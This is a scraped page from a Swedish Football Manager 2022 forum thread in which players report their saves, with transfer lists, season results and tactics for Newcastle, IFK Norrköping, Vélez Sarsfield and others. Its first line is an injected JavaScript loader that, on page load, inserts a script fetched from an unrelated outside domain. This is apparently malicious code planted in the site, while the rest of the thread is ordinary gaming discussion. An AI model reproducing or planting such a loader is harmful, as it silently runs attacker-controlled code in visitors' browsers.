;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vilket lag är du? Hur går det? – Sida 4 – Football Manager 2022 – FMSweden Forum
Meny Stäng

Vilket lag är du? H...

Share:
Notifications
Clear all

Vilket lag är du? Hur går det?

78 Inlägg
33 Users
115 Reactions
8,960 Visningar
trashbag
(@trashbag)
Reputable Member Admin

Jag följer Tifo Football på YouTube och då och då gör dom Sensible Transfers-videos. Det går helt enkelt ut på att dom lyfter fram några spelare dom tycker att ett givet lag ska värva. Efter att ha sett en sådan om video om Newcastle så bestämde jag mig för att spela lite med dom. Annars brukar jag sällan spela med lag med mycket pengar men ville ha lite avlastning från min vanliga save. Valde också en 4-1-4-1 formation som Tifo Football föreslog i videon. Så sagt och gjort startade jag upp en save och värvade dom tre spelarna i videon som lyftes fram som dom bästa alternativen. Notera att detta var innan spelare som Trippier och Wood blev klara för klubben IRL. Videon finns att hitta här om ni vill kolla in: https://www.youtube.com/watch?v=5gw-6UYxJQk Så hur har det gått hitills då? Jo låt mig klistra in wall of text här nedan.

2021/2022

Nyförvärv
---------
Aurélien Tchouameni - Monaco - 90mn €
Sven Botman - Lille - 33mn €
Corentin Tolisso - Bayern München - 7,5mn €

Tävlingar
---------
Premier League: 6:e plats
FA Cupen: Ut i 4:e omgången (1-1s mot Leeds Utd)
Ligacupen: Ut i 4:e omgången (2-4 mot Man Utd)

Bästa elva
----------
Mål: M. Dubravka - 6,94
BH: J. Manquillo - 7,11
BC: S. Botman - 7,20
BC: J. Lascelles - 7,16
BV: P. Dummett - 7,07
DM: I. Hayden - 6,77
MH: A. Saint-Maximin 7,21
MC: A. Tchouameni - 7,12
MC: C. Tolisso - 6,93
MV: R. Fraser - 7,22
AC: C. Wilson - 6,76

2022/2023

Nyförvärv
---------
Benjamin White - Arsenal - 81mn €
Giovanni Reyna - Dortmund - 65mn €
Kalvin Phillips - Leeds Utd - 83mn €

Tävlingar
---------
Premier League: 6:e plats
Europa League: Ut i Kvartsfinal (2-3 mot Inter)
FA Cupen: Ut i Kvartsfinal (1-2 mot Chelsea)
Ligacupen: Finalförlust (1-2 mot Man Utd)

Bästa elva
----------
Mål: M. Dubravka - 6,96
BH: J. Manquillo - 7,12
BC: B. White - 7,10
BC: S. Botman - 7,07
BV: J. Lewis - 7,06
DM: K. Philips - 6,94
MH: R. Fraser - 7,13
MC: A. Tchouameni - 7,13
MC: C. Tolisso - 6,86
MV: G. Reyna - 7,16
AC: C. Wilson - 7,28

2023/2024

Nyförvärv
---------
Ryan Kent - Rangers - 33mn €
Ben Godfrey - Everton - 66mn €
Pascal Struijk - Leeds Utd - 54mn €

Trupp inför säsong 3
--------------------
Mål: Martin Dubravka
Mål: Freddie Woodman

BH: Ben Godfrey
BH: Javi Manquillo
BC: Benjamin White
BC: Pascal Struijk
BC: Sven Botman
BC: Jamaal Lascelles
BV: Jamal Lewis
BV: Paul Dummett

DM: Kalvin Phillips
DM: Isaac Hayden

MH: Allan Saint-Maximin
MH: Ryan Fraser
MC: Aurélien Tchouameni
MC: Corentin Tolisso
MC: Joe Willock
MC: Sean Longstaff
MC: Rodrigo Vilca
MV: Miguel Almirón
MV: Giovanni Reyna
MHV: Jacob Murphy

AC: Callum Wilson
AC: Ryan Kent
AC: Joelinton

Som ni kanske noterat begränsar jag mig själv till att värva tre A-lagsspelare per säsong och dessa ska också ha någon slags engelsk koppling (brittisk nationalitet eller fostrad i england). Ja utöver dom tre säsong ett då jag följde sensible transfers-videon rakt av. Värvar också spelare till u-laget i varje vinterfönster men ingen av dom har slagit sig in i A-laget ännu. Målet är att vinna PL och CL med majoriteten av spelarna från dom brittiska öarna.

SvaraCitera
Pontarii
(@pontarii)
Active Member

IFK Norrköping

2022 - Pågående

Har egentligen bara spelat en riktig save på FM22 och det är min pågående med IFK Norrköping, föga överraskande då jag, som bekant, är född och uppvuxen  staden i fråga. På förhand strukturerade jag upp mitt uppdrag enligt ett par enkla principer som ska förhållas till under savens gång, dessa är;

- IFK Norrköping ska präglas av ett offensivt, kreativt och framförallt ett passningsorienterat taktiskt förhållningssätt. Stor vikt ska ligga på att froda kortpassningsspel genom samtliga lagdelar, inklusive målvakt och backlinje. Denna fotbollsideologi ska genomsyra alla klubbens lag, d.v.s. A-lag, U19-lag och vidare ned i åldrarna.

- Lokal anknytning värderas högt. Spelare födda i Norrköping, eller på annat sätt fostrade i staden, är högt ansedda och ska ha en central del i klubbens profil. Minst 5 A-lagsspelare per säsong ska antingen vara födda i Norrköping med omnejd alternativt fått sin fotbollsfostran (EP) i klubben. Därtill ska klubbens tränings- och ungdomsfaciliteter utvecklas och förbättras omgående för att maximera denna efterfrågan.

- IFK Norrköping ska vara en språngbräda för talanger världen över att ta sig vidare till världsfotbollens finrum. Detta innebär att rekryteringar primärt görs genom unga, lovande talanger som ska utvecklas i klubben för att sedermera säljas vidare till större klubbar internationellt för en klar ekonomisk vinst. Klubben ska i största möjliga mån arbeta aktivt för att inkludera vidareförsäljningsklausuler i alla spelarförsäljningar gällande spelare under 26 år samt undvika att erbjuda spelare kontraktsklausuler för minimibud.

- Scoutingnätverket byggs upp genom huvudscouten Stig Torbjörnsens förmåga där klubben ska agera aktivt på fotbollsmarknader som är mer ekonomiskt främjande. D.v.s. ska klubben undvika att köpa spelare från Sydamerika, Storbritannien, Italien, Tyskland och Spanien. Om en spelare ifrån dessa länder ska värvas måste de besitta en klar och tydlig kvalitetsförbättring gentemot redan befintliga spelare. 

- IFK Norrköping ska, inom en femårsperiod, utmana Malmö FF om att vara Sveriges rikaste klubb. Detta ska primärt ske genom såväl kontinuerligt Europeiskt cupspel samt spelarförsäljningar. För att maximera chanserna till detta ska klubben inte värva en enskild spelare för mer än 15 miljoner kronor. Ett undantag får göras varje 5-årsperiod.

Jag har, i skrivandes stund, spelat i sex säsonger och haft stora framgångar med laget. Eftersom jag skapar min egna taktik utan några som helst influenser ifrån andra framgångsrika taktiker som finns tillgängliga på diverse forum och workshops, i kombination med att jag inte köper varken superregens ifrån de länder man garanterat hittar världsklasspelare inom något år eller det jag betraktar som tråkiga FM-värvningar så är det inte superlätt att plocka Champions League, Europa League och hela paketet omgående. Istället krävs långsiktigt tänkande och strategiska beslut för att nå dit vi vill, och det kan jag stolt säga att jag har nyttjat. Nedan följer en liten resultatredovisning säsong för säsong där jag kommer börja rapportera om de två första åren;

2022 - Rikard Norling fick lämna IFK Norrköping efter en oväntat kort period vid rodret och ersattes av klubbens ungdomstränare Pontus Axelsson, i ett tämligen oväntat beslut. Axelsson, som fått mycket beröm för sin roll som spelarutvecklare i klubbens ungdomslag, anställdes mycket tack vare sin taktiska vision för klubben som numer skulle bli dess signum. Tillsammans med klubbens uppskattade huvudscout Stig Torbjörnsen och den nyanställde holländske sportchefen Jelle Hasselbaink* skulle IFK Norrköping satsa mot toppen. Första säsongen blev en smärre succé för den nye tränaren både spel- och resultatmässigt, då man säkrade klubbens första Svenska Cupen-titel sedan 1994 efter en 1-0 vinst mot Hammarby i finalen, men man föll oturligt på målsnåret i Allsvenskan där Malmö FF försvarade sin titel. Båda lagen slutade på 66 poäng, men Malmö kröntes som segrare tack vare en bättre målskillnad. Under året värvade klubben noterbara namn som Anton Salétros (2,75 milj) från Sarpsborg, Andreas Murbeck (1,5 milj) från Landskrona BoIS samt Oscar Uddenäs (350 tkr) från IFK Värnamo där framförallt de två förstnämnda spelade en central roll i lagets framgång. Lämnade klubben gjorde Maic Sema (300 tkr) som gick till SönderjyskE.

2023 - Inför säsongen tappade man flera tunga namn som varit bärande för laget under fjolåret. Succéspelaren Jonathan Levi gick till franska Brest för 25 miljoner kronor + 50% vidareförsäljning, målvaktsettan Oscar Jansson gick till franska Reims för 11 miljoner kronor, den lovande anfallstalangen Carl Björk tog klivet ut på kontinenten då han gick till Bundesligaklubben Mainz för hela 30 miljoner kronor + 50% vidareförsäljning medan den danske mittbacksgiganten Marco Lund tog färjan över till FC Köpenhamn för 16 miljoner kronor + 50% vidareförsäljning. Man släppte dessutom några överflödiga spelare i form av Yarhav Gurfinkel till israeliska Ashdod samt Egzon Binaku till Västerås SK, vilket innebar att man var tvungen att förstärka. Kalle Joelsson från Helsingborg plockades in för 1,2 miljoner kronor för att ersätta Oscar Jansson som förstemålvakt medan den f.d. IFK Norrköping-spelaren Eric Smith återvände ifrån tyska St. Pauli för samma summa. Nyligen nedflyttade Degerfors IF kunde inte behålla sin anfallsstjärna Victor Edvardsen som anslöt till IFK Norrköping över klubbar som Djurgården, AIK och IFK Göteborg för en summa av 1,6 miljoner kronor. Ifrån Superettan värvades även två framträdande mittfältare i Kevin Ackerman från Örgryte IS samt Ismet Lushaku från AFC Eskilstuna, båda på fri transfer då deras kontrakt gick ut efter säsongen. På Allsvenskans deadline day slog man till med en riktigt påkostad värvning i form av Saku Ylätupa från AIK som kostade 6 miljoner kronor att lösa. Finländaren sågs som en naturlig ersättare till Jonathan Levi, och därmed var man beredd att öppna skattkistan för att knyta den Ajax-fostrade yttern. Man tog även hem den f.d. SM-guldvinnande målvakten David Mitov Nilsson, som är född i staden, ifrån IK Sirius för 1,7 miljoner kronor för att ge Kalle Joelsson konkurrens om rollen som förstemålvakt. Under ett år där Malmö FF inte lyckades kombinera Allsvenskan och CL-spel gick IFK Norrköping som rena rama godståget, vilket ledde till klubbens fjortonde SM-guld. Christoffer Nyman vann skytteligan, Linus Wahlqvist blev uttagen till landslaget, Anton Salétros slog assistrekord, Alexander Fransson dirigerade mittfältet med bravur och Samuel Adegbenro var sensationell under hela året vilket ledde till en poängskörd av 78, vilket blev ett nytt svenskt rekord. Man kunde dock inte försvara sin Svenska Cupen-titel, istället förlorade man finalen mot Djurgårdens IF där Leo Bengtsson gjorde matchens enda mål. I kvalet till Europa Conference League slog man först ut portugisiska Boavista efter sammanlagt 5-4 över två matcher, medan grekiska Olympiakos blev numret för stort i den efterföljande kvalomgången. Med ett stundande CL-kval i horisonten och en trupp som jagas av flertalet stora klubbar runt om i världen stod Axelsson och hans ledarstab inför en stor utmaning. Skulle man kunna behålla lagets kärna? Hur skulle man orka med både spel i Allsvenskan och ett stundande CL-kval? Det var frågor som många på Curva Nordahl ställde sig inför säsongen 2024.

En summering av säsongerna 2024 & 2025 kommer framöver.

raca14, Maverick82, Snoka and 2 people reacted
SvaraCitera
(@maverick82)
Active Member

@pontarii 

Fan så trevligt det låter, jag har alltid, alltså allltid svårt med att få pekings uppställning och taktik att stämma. Vill du lägga upp lite bilder på hur du körde ditt första år med Peking?

SvaraCitera
Pontarii
(@pontarii)
Active Member

@maverick82 

Första åren så spelade jag enligt följande:

Målet där var att göra laget bekant med kortpassningsideologin jag är ute efter. Castegren som SSF var, och förblev, en nyckel i backlinjen då han har alla de egenskaper jag vill ha i en mittback i den rollen. Egentligen ville jag ha en till spelfördelande mittback bredvid honom, men Murbeck-värvningen ändrade dessa planer då han var för dålig med boll, kort och gott. Fransson var likväl viktig som DSF i att fördela spelet, med Skulason allt som oftast som städare framför honom i BMF-rollen, medan Salétros fick stora friheter att gå framåt som MEZ vilket var en enorm succé. Levi på högerkanten var mer fri i sina offensiva löpningar jämfört med Adegbenro på andra sidan, men den sistnämnde hade mer frihet att skjuta, vilket skapade mycket poäng. Sist men inte minst hade vi Il Capitano Nyman på topp som fick stora friheter att röra sig fritt och använda sin spelintelligens och arbetskapacitet för att skapa ytor åt sig själv och åt sina kollegor. Det var framgångsrikt, men det behövdes spetsa till för att vi skulle nå framåt rent taktiskt.

Numer spelar vi, allt som oftast, enligt ovan. Utan att spoila vilka spelare vi har fått in så är målvakten mer trygg med bollen vid fötterna, båda mittbackarna är kompatibla med att agera spelfördelande och vänsterbacken har fått en mer offensiv roll medan högerbacken är mer defensiv. Halvbacken framför försvaret är navet i press-spelet och defensiven, han gör så att den mer rörlige fria spelfördelaren kan vandra fritt samtidigt som MEZ-rollen är intakt och än idag produktiv. Yttrarna är offensiva, rörliga och har mandat att röra sig fritt. Enda skillnaden mellan dem är att vänsteryttern krymper ytorna och håller sig mer centralt, för att ge utrymme åt vänsterbackens överlappningar, medan högeryttern löper såväl inåt som ner på kanten. Anfallaren är identisk som förut, med undantaget för spelarinstruktionerna som instruerar denne att dribbla mer, skjuta mer och ströva fritt från sin position. 

Det är pretty much detta jag kört med i 6 säsonger, medan jag nu inför säsong 7 överväger att experimentera lite med såväl trebackslinje som ett central 5-mannakors utan yttrar. 

Micke reacted
SvaraCitera
Pontarii
(@pontarii)
Active Member

IFK Norrköping

2022 - Pågående

Jag kommer att summera år för år istället för två åt gången, märkte när jag började skriva att texten blir för lång och för att hålla läslusten uppe hos er så kör vi såhär istället. Eftersom jag är några år framåt i saven, och då jag egentligen aldrig hade någon tanke på att skriva om den här eller på andra ställen, så har jag inga aktuella screens från dessa säsonger, men när jag kommer ikapp spelandet och skrivandet så kommer jag delge intressanta screens på spelare, händelser, matcher och dylikt. Håll till godo.

2024 - Nyblivna mästare och en stundande CL-kval på tapeten fick IFK-ledningen, med succétränaren Pontus Axelsson i spetsen, anledning att rusta upp truppen för att hantera tre turneringar samtidigt, men som vanligt är det tufft för en svensk klubb att stå emot intressenter ifrån högre ansedda europeiska ligor. Först såldes Victor Edvardsen, det omtalade nyförvärvet som många trodde skulle bli en centralfigur i Axelssons bygge men som snarare agerat inhoppare för det mesta, till den historiska svenskklubben Heerenveen i Nederländerna efter att spelaren själv varit besviken med sin roll i laget. 15 miljoner för Edvardsen, som köptes för drygt 10% av denna summa, ansågs vara för bra för att tacka nej till vilket ledde till att den IFK Göteborg-fostrade strikern tog steget ut på kontinenten. Det gjorde också den nigerianske högeryttern Abdulrazak Ishaq, som roterats friskt tillsammans med fjolårets nyförvärv Saku Ylätupa. När rikemansklubben AS Monaco kom och knackade och erbjöd Peking en fin summa på 25 miljoner med en garanterad 50% vidareförsäljningsklausul så var det en omöjlighet att tacka nej, inte minst då Ishaq själv ville flytta till den franska ligatvåan och därmed hade IFK Norrköping säkrat 40 värdefulla miljoner på blott två spelarförsäljningar. Denna summa ökade dessutom med ytterligare 6 miljoner då den isländske mittbacken Finnur Tomas Pálmason, som aldrig gjorde en tävlingsmatch för klubben, såldes till franska FC Lorient. Pálmason hade visserligen gjort en framgångsrik sejour i Superettan-laget IK Sirius, coachade av den forne landslagshjälten Fredrik Ljungberg, under fjolåret men en plats bland Norrköpings tuffa mittbackskonkurrens ansågs den landslagsmeriterade backen inte vara redo för och därför ansågs Lorients bud vara för bra för att motstå. På utefronten fanns även två A-lagsspelare som inför säsongen valde att lägga skorna på hyllan. Både Viktor Agardius och Ari Freyr Skulason, som började fasas ut ur startelvan under fjolåret, avslutade sina illustrativa karriärer med ett SM-guld, sämre avslut kan man absolut ha med andra ord. Först in inför säsongen blev den f.d. Falkenbergsmittfältaren John Björkengren som var sugen på att återvända till Sverige igen efter tre säsonger i italienska Lecce i Serie B. 3,5 miljoner krävdes för att lösa Björkengren, vilket var samma summa som Peking slantade upp för sin nye vänsterback; Rami Kaib. Den forne Elfsborgsbacken plockades in från nederländska AZ, dit han värvats för 16 miljoner säsongen innan från Heerenveen, där han kontinuerligt petats av tränaren Henk de Jong, vilket möjliggjorde för en flytt till Axelssons lag. Utöver dessa värvningar till A-laget plockades en hel del unga, lovande talanger in där vissa onekligen skulle göra avtryck i klubben på ett eller flera sätt senare i deras karriärer, men den enda av de lovande talangerna som fick en A-lagsplats denna säsong var den finska 17-årigen Pekka Ojanperä från Ilves, där han gjort 8 A-lagsmatcher trots sin ringa ålder.

Nog om övergångar, låt oss summera säsongens tävlingsresultat. För första gången under Axelssons styre kvalificerade man sig inte för Svenska Cupen-finalen, faktum är att man inte ens nådde semifinal. Istället blev det respass ur kvartsfinalen då man förlorade mot AIK på straffar, något som genererade en hel del kritik ifrån såväl ledningen som klubbens supportrar. Detta reparerade man snabbt genom att gå obesegrade under Allsvenskans första sexton matcher, varav tretton av dessa var segrar. Laget öste in mål och höll tätt bakåt, endast fyra insläppta på dessa sexton matcher var ett starkt kvitto för defensiven och för Kalle Joelsson i målet som numer helt förpassat konkurrenten David Mitov Nilsson till bänken. Första förlusten kom i omgång 17 borta mot BK Häcken som vann med 1-0, men faktum är att denna match kom precis efter det första dubbelmötet i CL-kvalet, så helt överraskande var det inte då Norrköping mönstrade en klart roterad elva den gången.

Polska mästarna Legia stod för motståndet i den första kvalomgången, vilket blev en förvånansvärt enkel match för Peking som enkelt vann dubbelmötet med 5-1 sammanlagt. Ett mardrömsmotstånd väntade i den andra kvalomgången i form av ryska mästarna CSKA Moskva, och mardrömmen såg ut att bli just detta efter det första mötet borta på CSKA Arena där den forne IFK Norrköping-spelaren Arnor Sigurdson målade två gånger om och gav ryssarna en 4-2 ledning inför returen. Att vända ett sådant underläge i sig är svårt, att göra det mot en storklubb som CSKA är snudd på omöjligt, men med 92 minuter spelade på klockan stod det 3-1 till hemmalaget vilket skulle ge en förlängning om det stod sig. Enter: Samuel Adegbenro. Vänsteryttern snurrade upp CSKA-försvaret och rakade in sitt andra mål för dagen och 4-1 totalt, vilket skickade Peking vidare till nästa kvalomgång, smått sensationellt minst sagt. I kvalomgång 3 väntade Astana från Kazachstan, absolut ett tufft motstånd men om man har slagit ut CSKA så ska det inte vara en omöjlighet att upprepa bedriften mot Astana. Sagt och gjort, 5-2 borta och 2-0 hemma gav Peking en totalseger på 7-2, och därmed var man klara för sista steget inför ett mäktigt CL-gruppspel, ett playoff-möte i dubbelform mot Basel. Trots en fin 2-1 seger hemma i första mötet orkade man inte hålla det uppe i returen borta på St Jakob-Park, där Basel vann tryggt med 3-1. Därmed var Peking visserligen utslaget ur Champions League, men man hade åtminstone kvalificerat sig för ett Europa League-gruppspel, en otrolig bedrift. Under tiden som Europa-äventyret pågick så vann man Allsvenskan. Även om det gjordes med 8 poäng mindre än fjolårets 78-poängstotal, så var det ändå tämligen behagligt då man krossade AIK i sista omgången med 4-1 och fick lyfta pokalen före konkurrenterna Malmö FF. EL-gruppspelet blev minnesvärt då man mötte storlag som Napoli och Real Betis, samt grannarna FC Midtjylland. Faktum är att IFK Norrköping vann mot både Napoli och Midtjylland, de två lag som tog sig vidare ifrån gruppen, under gruppspelet (2-1 seger borta mot danskarna, 1-0 seger hemma mot italienarna), men man kom ändå sist i gruppen på samma poäng som Betis men med avsevärt sämre målskillnad. Säsongen 2024 blev onekligen en minnesvärd säsong för IFK Norrköping och något som fansen sent skulle glömma.

This post was modified 3 år sedan 2 times by Pontarii

Argt Troll and trashbag reacted
SvaraCitera
(@mikbj86)
Active Member

Startad en engelsk tränar karriär får se vart det bär mig.
Inledde i Hereford där det direkt blev en skrällseger och uppflyttning.

uppflytningen ledde till en chans i Plymouth i league 1 nu inne på min 8:e säsong för klubben och nyupprättad till premier league men står nu i december i valet om jag ska stanna och kämpa för strecket eller lämna till något av två hypet intressanta klubbar Liverpool eller Arsenal? Båda dessa har haft kräftgång och missat CL eller Europa sista 5 säsongerna så finns en rolig utmaning att vända skutan ? 

Mycket sugen på Arsenal då jag aldrig tränat dom trots en 20 år i CM/FM världen. 

vad tycker ni stanna och kämpa för nedflyttning eller lämna för någon av de forna Big5 klubbarna?

SvaraCitera
raca14
(@raca14)
Reputable Member

@mikbj86 Tycker du ska stanna kvar säsongen ut, men kan iaf försöka förhandla med Arsenal om att ta över efter säsongen redan nu?

SvaraCitera
(@mikbj86)
Active Member

Tack för tipset, hur förhandlar man att kontraktet ska börja gälla from kommande säsong? Kan inte ända i kontraktsförhandlingen där är det endast omgående som står ?

SvaraCitera
raca14
(@raca14)
Reputable Member

@mikbj86 Det har jag tyvärr inget svar på... :/

SvaraCitera
(@mikbj86)
Active Member

Det blev ett nej till både Arsenal och Liverpool för en fortsättning mot att klara kontraktet första säsongen. 
tyvärr blev det en tung andra halva på säsongen med endast 10p inspelat och nedflyttning med endast 6p marginal så riktigt surt. Glädje ämnet på säsongen blev annars en kvartsfinal i Carabao cup. 

Ny vänder blickarna vidare mot Man City som kontakta mig i omg 32 där jag lyckades förhandla fram kontraktstart efter säsongen. Dom slutade 5:a föregående år och ska ta upp jakten på Newcastle som är regerande mästare. 

Inledde med rejäl föryngring av laget där Ederson, Dias, Kambulla, Papetti, Torres och Sterling slängdes mer eller mindre ut.

Ersatte dessa med Saka som största namnet, även Etete och Bloxham från Plymouth fick följda med över till de blå plus ett par spännande tegens inplockade från Lyon & Real. 

Nu kör mot nya framgångar och längtan efter en inhemsk titel ?

SvaraCitera
(@velez)
New Member

Club Atletico Velez Sarsfield

Hemma Arena: Jose Amalfitani

Land: Argentina

Liga: Argentinska Division 1

Cuper: Argentinska Cupen och Sydamerikanska Copa Libertadores

Manager: Daniel

Viktiga spelare: Thiago Almada 20 år och Federico Mancuello 32 år

Formation: 4-2-3-1

Startelva och Backups:

Målvakt: Lucas Hoyos 32 år / Matias Borgogno 22 år 

Vänsterback: Francisco Ortega 22 år / Nazareno Romero 21 år

Mittbackar: Lautuaro Giannetti 27 år Matias de los Santos 28 år / Miguel Brizuela 24 år Enzo Martinez 23 år Tomas Rocha 18 år

Högerback: Tomas Guidara 25 år / Leonardo Jara 30 år

Mittfältare: Federico Mancuello 32 år Santiago Caseres 24 år / Agustin Mulet 21 år Ricky Alvarez 33 år

Offensiv Mittfältare Vänster: Ricardo Centurion 28 år / Guido Vadala 24 år Lucas Janson 26 år

Offensiv Mittfältare Centralt: Thiago Almada 20 år / Nicolas Garayalde 22 år

Offensiv Mittfältare Höger: Luca Orellano 21 år / Agustin Bouzat 27 år Federico Versaci 19 år

Anfallare: Cristian Tarragona 30 år / Lucas Pratto (Långtidskadad) 33 år Emanuel Adebayor 37 år

Nyförvärv: Guido Vadala och Emanuel Adebayor båda på fri transfer.

Valde att Starta med Velez Sarsfield då jag antar att dom är tämligen okända här i Sverige, såvida man inte är hårdnackad fotbollskunnig tok 😉

Club Atletico Velez Sarsfield är en klubb med en extremt bra ungdoms akademi, här kommer du inte att ha brist på ungdomar som knackar på dörren till A-laget, i övrigt så är laget stabilt med en bra defensiv och om du får igång Almada så i kombination med övriga offensiva spelare blir det en fruktad offensiv 😉

Jag har startat ligan sisådär men fick i dom första 2 matcherna tuffast möjliga motstånd i River Plate på bortaplan förlust med 2 - 0 och Racing Central borta förlust 2 - 1 men sen har jag spelat Hemma mot Banfield där jag vann med 1 - 0 efter ett vackert mål av Mancuello i slutminuterna hade ett bollinnehav på 37% men överlägset flest chanser. Vinst över Rosario Central med 4 - 2.

I Argentinska cupen har jag en match som vanns med 2 - 1 mot Agropecuario Argentino Div 2 och är vidare till nästa omgång.

Copa Libertadores hade startat redan i saven och jag var vidare till Åttondelen där jag ställdes mot Liga de Quito. Vann hemma med 3 - 2 och skulle sen möta dom även borta som var en nervkittlande match som slutade 1 - 1 och jag gick vidare till Kvartsfinalen där jag kommer att ställas mot Racing Club som jag nu har en aning om hur bra dom är 😉

This post was modified 3 år sedan by Velez

Bulbabae reacted
SvaraCitera
(@bringan)
New Member

Avslutade precis tredje säsongen med BP. Efter att ha vunnit Div 1 och sedan följt upp det med seger i Superettan trodde jag vi skulle få kämpa för att hålla oss kvar då det gått fortare än jag trodde att ta oss till Allsvenskan.
Det visade sig dock att vi klarade av att växa in i kostymen och det resulterade i en 3:eplats i en upplaga av Allsvenskan som överraskande vanns av Varberg.

Inför nästa säsong är tanken att ge ännu fler yngre förmågor chansen än tidigare så får vi se om vi kan följa upp denna succén.

Tabell

This post was modified 3 år sedan by bringan

Argt Troll reacted
SvaraCitera
(@bringan)
New Member

Andra säsongen i Allsvenskan avklarad med BP. Efter en överraskande 3:e plats vårt första år så var det spännande att se hur vi skulle klara oss andra säsongen i svensk fotbolls finrum. Förvånande nog gick det bättre ute i Europa än hemma i Sverige. En 5:e-plats i Allsvenskan, som för andra året i rad vanns av Varberg, är inte fy skam. Dock med sur eftersmak då vi länge var med och slogs i toppen av tabellen och tappade 3:e-platsen som innebär europaspel i sista omgången.

När vi vart ute i Europa Conference League i år har vi däremot chockat gång på gång i positiv bemärkelse.

Efter att ha slagit ut Cluj, Milsami Orhei (Moldavien) och Gent i kvalspel gick vi och vann vår grupp där enda poängtappet kom mot Mechelem hemma. Glädjande för Sverige har även Djurgården och Varberg gått vidare från sina grupper. Blir spännande att se om det tar stopp här eller om något lag kan krångla sig vidare från första utslagsrundan. 

Allsvenskan

ECL

Argt Troll reacted
SvaraCitera
raca14
(@raca14)
Reputable Member

@bringan Härligt att se AIK åka ner till Superettan! 😛

Hade gärna sett en SR från dig. 🙂

bringan reacted
SvaraCitera
pilmalm
(@pilmalm)
New Member

Alla moderatorer, lägg mig rätt om jag är fel ute. Men hittade ingen "Vilket lag ska jag vara", så postar här. 

Letar ett lag med hög potential (alltså, sånt som ex arenans kapacitet, ungdomsintag och faciliteter, okej och talangfullt lag (eller U23/U18), bra personal eller en bred personalstyrka) I antingen ett land med lägre rykte eller i en större liga fast med lägre förväntning.

Hjälp mig! 

SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin

Fortsättning på mitt Newcastle-äventyr nedan. Som sagt vi värvar tre spelare med brittisk koppling per sommarfönster. Sedan tre ungdomar med brittisk koppling i varje vinterfönster.

2023/2024

Nyförvärv
---------
Ryan Kent - Rangers - 33mn €
Ben Godfrey - Everton - 66mn €
Pascal Struijk - Leeds Utd - 54mn €

Tävlingar
---------
Premier League: 3:e plats
Europa League: Finalförlust (1-2 mot Lazio)
FA Cupen: Ut i Semifinal (1-3f mot Man Utd)
Ligacupen: Ut i Semifinal (2-3 mot Man City)

Bästa elva
----------
Mål: M. Dubravka - 6,93
BH: J. Manquillo - 7,08
BC: S. Botman - 7,28
BC: B. Godfrey - 7,15
BV: J. Lewis - 7,29
DM: K. Phillips - 7,08
MH: A. Saint-Maximin - 7,03
MC: A. Tchouameni - 7,21
MC: G. Reyna - 7,00
MV: R. Kent - 7,55
AC: C. Wilson - 7,31

2024/2025

Nyförvärv
---------
Oliver Skipp - Tottenham - 39mn €
Dean Henderson - Man Utd - 30mn €
Richarlison - Everton - 75mn €

Tävlingar
---------
Premier League: 2:a plats
Champions League: Ut i Kvartsfinal (1-3 mot Liverpool)
FA Cupen: Vinnare (2-0 mot Man Utd)
Ligacupen: Ut i Kvartsfinal (1-2 mot Brighton)

Bästa elva
----------
Mål: D. Henderson - 6,97
BH: B. White - 7,21
BC: B. Godfrey - 7,40
BC: S. Botman - 7,40
BV: J. Lewis - 7,13
DM: O. Skipp - 7,02
MH: A. Saint-Maximin - 7,18
MC: A. Tchouameni - 7,23
MC: G. Reyna - 7,00
MV: R. Kent - 7,55
AC: Richarlison - 7,09

2025/2026

Nyförvärv
---------
Aaron Connolly - Rangers - 7,5mn €
Chris Mepham - Liverpool - 75mn €
Matty Cash - Aston Villa - 27mn €

Trupp inför säsong 5
--------------------
Mål: Dean Henderson
Mål: Freddie Woodman

BH: Ben Godfrey
BH: Matty Cash
BC: Benjamin White
BC: Sven Botman
BC: Pascal Struijk
BC: Chris Mepham
BV: Jamal Lewis
BV: Tayo Adaramola (Värvad S1, Uppflyttad S4)

DM: Oliver Skipp
DM: Kalvin Phillips

MH: Allan Saint-Maximin
MH: Ryan Fraser
MC: Aurélien Tchouameni
MC: Giovanni Reyna
MC: Corentin Tolisso
MC: Joe Willock
MC: Sean Longstaff
MV: Ryan Kent
MV: Elliot Anderson (Uppflyttad S4)
MHV: Rob Wilkinson (Värvad S2, Uppflyttad S5)

AC: Richarlison
AC. Aaron Connolly
AC: Callum Wilson

Screen på Rob Wilkinson som blir första newgen som vi lyfter upp till A-laget (klicka för att komma till större bild): https://imgur.com/aN2UD8a

This post was modified 3 år sedan 4 times by trashbag

SvaraCitera
raca14
(@raca14)
Reputable Member

@pilmalm Ajax kanske?

pilmalm reacted
SvaraCitera
pilmalm
(@pilmalm)
New Member

@raca14 Hamnade hos Derby 🙂

-21 när vi börjar men med en talangfull trupp och ett nyligen genomfört ungdomsintag så blev det bra!

raca14 reacted
SvaraCitera
Sida 4 / 4
Share: